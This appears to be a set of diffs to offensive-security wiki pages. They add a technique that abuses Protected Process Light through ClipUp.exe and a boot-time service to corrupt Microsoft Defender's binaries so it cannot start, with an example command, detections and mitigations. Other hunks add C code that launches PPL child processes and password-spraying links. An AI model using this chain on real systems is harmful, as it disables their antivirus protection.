- [https://github.com/Hackndo/sprayhound](https://github.com/Hackndo/sprayhound)
- [https://github.com/login-securite/conpass](https://github.com/login-securite/conpass)
- [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying)
- [https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell](https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell)
- [www.blackhillsinfosec.com/?p=5296](https://www.blackhillsinfosec.com/?p=5296)
@ -149,6 +229,3 @@ To use any of these tools, you need a user list and a password / a small list of
{{#include ../../banners/hacktricks-training.md}}

View File

@ -755,10 +755,89 @@ After replacing the original files and restarting the service stack:
This case study demonstrates how purely client-side trust decisions and simple signature checks can be defeated with a few byte patches.
## Abusing Protected Process Light (PPL) To Tamper AV/EDR With LOLBINs
Protected Process Light (PPL) enforces a signer/level hierarchy so that only equal-or-higher protected processes can tamper with each other. Offensively, if you can legitimately launch a PPL-enabled binary and control its arguments, you can convert benign functionality (e.g., logging) into a constrained, PPL-backed write primitive against protected directories used by AV/EDR.
What makes a process run as PPL
- The target EXE (and any loaded DLLs) must be signed with a PPL-capable EKU.
- The process must be created with CreateProcess using the flags: `EXTENDED_STARTUPINFO_PRESENT | CREATE_PROTECTED_PROCESS`.
- A compatible protection level must be requested that matches the signer of the binary (e.g., `PROTECTION_LEVEL_ANTIMALWARE_LIGHT` for anti-malware signers, `PROTECTION_LEVEL_WINDOWS` for Windows signers). Wrong levels will fail at creation.
See also a broader intro to PP/PPL and LSASS protection here:
{{#ref}}
stealing-credentials/credentials-protections.md
{{#endref}}
Launcher tooling
- Open-source helper: CreateProcessAsPPL (selects protection level and forwards arguments to the target EXE):
- [https://github.com/2x7EQ13/CreateProcessAsPPL](https://github.com/2x7EQ13/CreateProcessAsPPL)
- Usage pattern:
```text
CreateProcessAsPPL.exe <level 0..4> <path-to-ppl-capable-exe> [args...]
# example: spawn a Windows-signed component at PPL level 1 (Windows)
CreateProcessAsPPL.exe 1 C:\Windows\System32\ClipUp.exe <args>
# example: spawn an anti-malware signed component at level 3
CreateProcessAsPPL.exe 3 <anti-malware-signed-exe> <args>
```
LOLBIN primitive: ClipUp.exe
- The signed system binary `C:\Windows\System32\ClipUp.exe` self-spawns and accepts a parameter to write a log file to a caller-specified path.
- When launched as a PPL process, the file write occurs with PPL backing.
- ClipUp cannot parse paths containing spaces; use 8.3 short paths to point into normally protected locations.
8.3 short path helpers
- List short names: `dir /x` in each parent directory.
- Derive short path in cmd: `for %A in ("C:\ProgramData\Microsoft\Windows Defender\Platform") do @echo %~sA`
Abuse chain (abstract)
1) Launch the PPL-capable LOLBIN (ClipUp) with `CREATE_PROTECTED_PROCESS` using a launcher (e.g., CreateProcessAsPPL).
2) Pass the ClipUp log-path argument to force a file creation in a protected AV directory (e.g., Defender Platform). Use 8.3 short names if needed.
3) If the target binary is normally open/locked by the AV while running (e.g., MsMpEng.exe), schedule the write at boot before the AV starts by installing an auto-start service that reliably runs earlier. Validate boot ordering with Process Monitor (boot logging).
4) On reboot the PPL-backed write happens before the AV locks its binaries, corrupting the target file and preventing startup.
Example invocation (paths redacted/shortened for safety):
```text
# Run ClipUp as PPL at Windows signer level (1) and point its log to a protected folder using 8.3 names
CreateProcessAsPPL.exe 1 C:\Windows\System32\ClipUp.exe -ppl C:\PROGRA~3\MICROS~1\WINDOW~1\Platform\<ver>\samplew.dll
```
Notes and constraints
- You cannot control the contents ClipUp writes beyond placement; the primitive is suited to corruption rather than precise content injection.
- Requires local admin/SYSTEM to install/start a service and a reboot window.
- Timing is critical: the target must not be open; boot-time execution avoids file locks.
Detections
- Process creation of `ClipUp.exe` with unusual arguments, especially parented by non-standard launchers, around boot.
- New services configured to auto-start suspicious binaries and consistently starting before Defender/AV. Investigate service creation/modification prior to Defender startup failures.
- File integrity monitoring on Defender binaries/Platform directories; unexpected file creations/modifications by processes with protected-process flags.
- ETW/EDR telemetry: look for processes created with `CREATE_PROTECTED_PROCESS` and anomalous PPL level usage by non-AV binaries.
Mitigations
- WDAC/Code Integrity: restrict which signed binaries may run as PPL and under which parents; block ClipUp invocation outside legitimate contexts.
- Service hygiene: restrict creation/modification of auto-start services and monitor start-order manipulation.
- Ensure Defender tamper protection and early-launch protections are enabled; investigate startup errors indicating binary corruption.
- Consider disabling 8.3 short-name generation on volumes hosting security tooling if compatible with your environment (test thoroughly).
References for PPL and tooling
- Microsoft Protected Processes overview: https://learn.microsoft.com/windows/win32/procthread/protected-processes
- EKU reference: https://learn.microsoft.com/openspecs/windows_protocols/ms-ppsec/651a90f3-e1f5-4087-8503-40d804429a88
- Procmon boot logging (ordering validation): https://learn.microsoft.com/sysinternals/downloads/procmon
- CreateProcessAsPPL launcher: https://github.com/2x7EQ13/CreateProcessAsPPL
- Technique writeup (ClipUp + PPL + boot-order tamper): https://www.zerosalarium.com/2025/08/countering-edrs-with-backing-of-ppl-protection.html
## References
- [Unit42 New Infection Chain and ConfuserEx-Based Obfuscation for DarkCloud Stealer](https://unit42.paloaltonetworks.com/new-darkcloud-stealer-infection-chain/)
- [Synacktiv Should you trust your zero trust? Bypassing Zscaler posture checks](https://www.synacktiv.com/en/publications/should-you-trust-your-zero-trust-bypassing-zscaler-posture-checks.html)
- [Check Point Research Before ToolShell: Exploring Storm-2603s Previous Ransomware Operations](https://research.checkpoint.com/2025/before-toolshell-exploring-storm-2603s-previous-ransomware-operations/)
- [Microsoft Protected Processes](https://learn.microsoft.com/windows/win32/procthread/protected-processes)
- [Microsoft EKU reference (MS-PPSEC)](https://learn.microsoft.com/openspecs/windows_protocols/ms-ppsec/651a90f3-e1f5-4087-8503-40d804429a88)
- [Sysinternals Process Monitor](https://learn.microsoft.com/sysinternals/downloads/procmon)
- [CreateProcessAsPPL launcher](https://github.com/2x7EQ13/CreateProcessAsPPL)
- [Zero Salarium Countering EDRs With The Backing Of Protected Process Light (PPL)](https://www.zerosalarium.com/2025/08/countering-edrs-with-backing-of-ppl-protection.html)
{{#include ../banners/hacktricks-training.md}}

View File

@ -38,6 +38,64 @@ This structure is packed into a single byte and determines **who can access whom
- LSASS being PPL does **not prevent credential dumping if you can execute kernel shellcode** or **leverage a high-privileged process with proper access**.
- **Setting or removing PPL** requires reboot or **Secure Boot/UEFI settings**, which can persist the PPL setting even after registry changes are reversed.
### Create a PPL process at launch (documented API)
Windows exposes a documented way to request a Protected Process Light level for a child process during creation using the extended startup attribute list. This does not bypass signing requirements — the target image must be signed for the requested signer class.
Minimal flow in C/C++:
```c
// Request a PPL protection level for the child process at creation time
// Requires Windows 8.1+ and a properly signed image for the selected level
#include <windows.h>
int wmain(int argc, wchar_t **argv) {
STARTUPINFOEXW si = {0};
PROCESS_INFORMATION pi = {0};
si.StartupInfo.cb = sizeof(si);
SIZE_T attrSize = 0;
InitializeProcThreadAttributeList(NULL, 1, 0, &attrSize);
si.lpAttributeList = (PPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attrSize);
if (!si.lpAttributeList) return 1;
if (!InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attrSize)) return 1;
DWORD level = PROTECTION_LEVEL_ANTIMALWARE_LIGHT; // or WINDOWS_LIGHT/LSA_LIGHT/WINTCB_LIGHT
if (!UpdateProcThreadAttribute(
si.lpAttributeList, 0,
PROC_THREAD_ATTRIBUTE_PROTECTION_LEVEL,
&level, sizeof(level), NULL, NULL)) {
return 1;
}
DWORD flags = EXTENDED_STARTUPINFO_PRESENT;
if (!CreateProcessW(L"C\\Windows\\System32\\notepad.exe", NULL, NULL, NULL, FALSE,
flags, NULL, NULL, &si.StartupInfo, &pi)) {
// If the image isn't signed appropriately for the requested level,
// CreateProcess will fail with ERROR_INVALID_IMAGE_HASH (577).
return 1;
}
// cleanup
DeleteProcThreadAttributeList(si.lpAttributeList);
HeapFree(GetProcessHeap(), 0, si.lpAttributeList);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return 0;
}
```
Notes and constraints:
- Use `STARTUPINFOEX` with `InitializeProcThreadAttributeList` and `UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_PROTECTION_LEVEL, ...)`, then pass `EXTENDED_STARTUPINFO_PRESENT` to `CreateProcess*`.
- The protection `DWORD` can be set to constants such as `PROTECTION_LEVEL_WINTCB_LIGHT`, `PROTECTION_LEVEL_WINDOWS`, `PROTECTION_LEVEL_WINDOWS_LIGHT`, `PROTECTION_LEVEL_ANTIMALWARE_LIGHT`, or `PROTECTION_LEVEL_LSA_LIGHT`.
- The child only starts as PPL if its image is signed for that signer class; otherwise process creation fails, commonly with `ERROR_INVALID_IMAGE_HASH (577)` / `STATUS_INVALID_IMAGE_HASH (0xC0000428)`.
- This is not a bypass — its a supported API meant for appropriately signed images. Useful to harden tools or validate PPL-protected configurations.
Example CLI using a minimal loader:
- Antimalware signer: `CreateProcessAsPPL.exe 3 C:\Tools\agent.exe --svc`
- LSA-light signer: `CreateProcessAsPPL.exe 4 C:\Windows\System32\notepad.exe`
**Bypass PPL protections options:**
If you want to dump LSASS despite PPL, you have 3 main options:
@ -143,7 +201,12 @@ For more detailed information, consult the official [documentation](https://docs
| Schema Admins | Schema Admins | Schema Admins | Schema Admins |
| Server Operators | Server Operators | Server Operators | Server Operators |
{{#include ../../banners/hacktricks-training.md}}
## References
- [CreateProcessAsPPL minimal PPL process launcher](https://github.com/2x7EQ13/CreateProcessAsPPL)
- [STARTUPINFOEX structure (Win32 API)](https://learn.microsoft.com/en-us/windows/win32/api/winbase/ns-winbase-startupinfoexw)
- [InitializeProcThreadAttributeList (Win32 API)](https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-initializeprocthreadattributelist)
- [UpdateProcThreadAttribute (Win32 API)](https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-updateprocthreadattribute)
- [LSASS RunAsPPL background and internals](https://itm4n.github.io/lsass-runasppl/)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -106,7 +106,7 @@ int wmain(void) {
STARTUPINFOW si = { .cb = sizeof(si) };
PROCESS_INFORMATION pi = { 0 };
if (CreateProcessWithTokenW(dupToken, LOGON_WITH_PROFILE,
L"C\\\Windows\\\System32\\\cmd.exe", NULL, CREATE_NEW_CONSOLE,
L"C\\\\Windows\\\\System32\\\\cmd.exe", NULL, CREATE_NEW_CONSOLE,
NULL, NULL, &si, &pi)) {
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
@ -159,8 +159,54 @@ int main(void) {
---
## Create child as Protected Process Light (PPL)
Request a PPL protection level for a child at creation time using `STARTUPINFOEX` + `PROC_THREAD_ATTRIBUTE_PROTECTION_LEVEL`. This is a documented API and will only succeed if the target image is signed for the requested signer class (Windows/WindowsLight/Antimalware/LSA/WinTcb).
```c
// x86_64-w64-mingw32-gcc -O2 -o spawn_ppl.exe spawn_ppl.c
#include <windows.h>
int wmain(void) {
STARTUPINFOEXW si = {0};
PROCESS_INFORMATION pi = {0};
si.StartupInfo.cb = sizeof(si);
SIZE_T attrSize = 0;
InitializeProcThreadAttributeList(NULL, 1, 0, &attrSize);
si.lpAttributeList = (PPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attrSize);
InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &attrSize);
DWORD lvl = PROTECTION_LEVEL_ANTIMALWARE_LIGHT; // choose the desired level
UpdateProcThreadAttribute(si.lpAttributeList, 0,
PROC_THREAD_ATTRIBUTE_PROTECTION_LEVEL,
&lvl, sizeof(lvl), NULL, NULL);
if (!CreateProcessW(L"C\\\Windows\\\System32\\\notepad.exe", NULL, NULL, NULL, FALSE,
EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi)) {
// likely ERROR_INVALID_IMAGE_HASH (577) if the image is not properly signed for that level
return 1;
}
DeleteProcThreadAttributeList(si.lpAttributeList);
HeapFree(GetProcessHeap(), 0, si.lpAttributeList);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return 0;
}
```
Levels used most commonly:
- `PROTECTION_LEVEL_WINDOWS_LIGHT` (2)
- `PROTECTION_LEVEL_ANTIMALWARE_LIGHT` (3)
- `PROTECTION_LEVEL_LSA_LIGHT` (4)
Validate the result with Process Explorer/Process Hacker by checking the Protection column.
---
## References
* Ron Bowes “Fodhelper UAC Bypass Deep Dive” (2024)
* SplinterCode “AMSI Bypass 2023: The Smallest Patch Is Still Enough” (BlackHat Asia 2023)
* CreateProcessAsPPL minimal PPL process launcher: https://github.com/2x7EQ13/CreateProcessAsPPL
* Microsoft Docs STARTUPINFOEX / InitializeProcThreadAttributeList / UpdateProcThreadAttribute
{{#include ../../banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}